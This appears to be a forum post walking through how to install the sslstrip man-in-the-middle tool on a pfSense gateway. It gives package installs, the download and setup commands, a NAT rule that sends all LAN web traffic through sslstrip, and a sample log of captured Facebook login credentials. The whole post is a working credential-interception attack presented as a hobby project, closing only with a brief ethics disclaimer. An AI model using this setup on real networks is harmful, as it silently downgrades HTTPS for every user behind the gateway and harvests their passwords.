Running SSLSTRIP on a pfSense box

alt0001

Hi all, this is my first post here.

I consider myself to be a total noob when it comes to pfSense or freebsd. However, I was looking into mitm type attacks for fun and wondered if it would be possible to run sslstrip on the gateway itself as to automatically process all traffic without the need for arp poisoning. I searched the web but couldn't find any info on how to do this, but I got it working on my own and thought I would share my experience here.

I don't know exactly where to put this so I chose the general forum. Mods feel free to move it to a more appropriate location.

First, we need to add a couple of packages to the box so SSLstrip can actually run:

pkg_add -r ftp://ftp-archive.freebsd.org/pub/FreeBSD-Archive/ports/i386/packages-8.1-release/python/py26-twistedWeb-9.0.0.tbz

This installs the Python Twisted Web python-module which is needed for sslstrip functionality. As a bonus, python itself gets installed automatically as a dependency.

pkg_add -r ftp://ftp-archive.freebsd.org/pub/FreeBSD-Archive/ports/i386/packages-8.1-release/python/py26-openssl-0.10.tbz

The openssl python-module is also needed for sslstrip, I couldn't start sslstrip without it.

pkg_add -r ftp://ftp-archive.freebsd.org/pub/FreeBSD-Archive/ports/i386/packages-8.1-release/ftp/wget-1.12_1.tbz

Installing wget ensures an easy method of getting the sslstrip tar file on your box.

rehash

Dont know what this is for, but I read online that you need to do this after installing packages.

cd

Let's run everything from the root home dir…

wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz

Download the sslstrip files

tar zxvf sslstrip-0.9.tar.gz

Extract the files to the ~/sslstrip-0.9 directory.

cd sslstrip-0.9

Change to the extracted directory

python setup.py install

Install the sslstrip files to the system

So now you can try if it works:

/usr/local/bin/sslstrip -h

You should get something like this:

[2.0.2-RC3][root@pfsense.localdomain]/root(2): /usr/local/bin/sslstrip -h

sslstrip 0.9 by Moxie Marlinspike
Usage: sslstrip <options>

Options:
-w <filename>, --write= <filename>Specify file to log to (optional).
-p , --post                       Log only SSL POSTs. (default)
-s , --ssl                        Log all SSL traffic to and from server.
-a , --all                        Log all SSL and HTTP traffic to and from server.
-l <port>, --listen=<port>        Port to listen on (default 10000).
-f , --favicon                    Substitute a lock favicon on secure requests.
-k , --killsessions               Kill sessions in progress.
-h                                Print this help message.

[2.0.2-RC3][root@pfsense.localdomain]/root(3):</port></port></filename></filename></options>

Now, we need to create a nat rule to forward all tcp port 80 traffic to the port on which sslstrip listens. This is port 10000 by default.

Go to firewall/NAT and create a new rule. Source address=LAN Net, proto=tcp, dest ports=80, nat ip=<ip address="" of="" your="" box="">, nat ports=10000. A firewall rule should be created automatically for you to put port 10000 open.

Now in a ssh shell, run

/usr/local/bin/sslstrip &

This ensures sslstrip remains active even if you close the ssh session.

Now a logfile is created in root's home dir called sslstrip.log which should contain passwords.

Output of the file looks like so:

[2.0.2-RC3][root@pfsense.localdomain]/root(9): cat sslstrip.log
2012-07-03 21:49:49,290 POST Data (www.facebook.com):
lsd=AVpQRVOK&return_session=0&legacy_return=1&display=&session_key_only=0&trynum=2&charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84&timezone=-120&lgnrnd=124859_hr3C&lgnjs=n&email=testing&pass=testing123&default_persistent=0&login=Log+In
[2.0.2-RC3][root@pfsense.localdomain]/root(10):

You can see I entered testing as a username and testing123 as a password.

That's all now. Please use this in an ethically responsible way.</ip>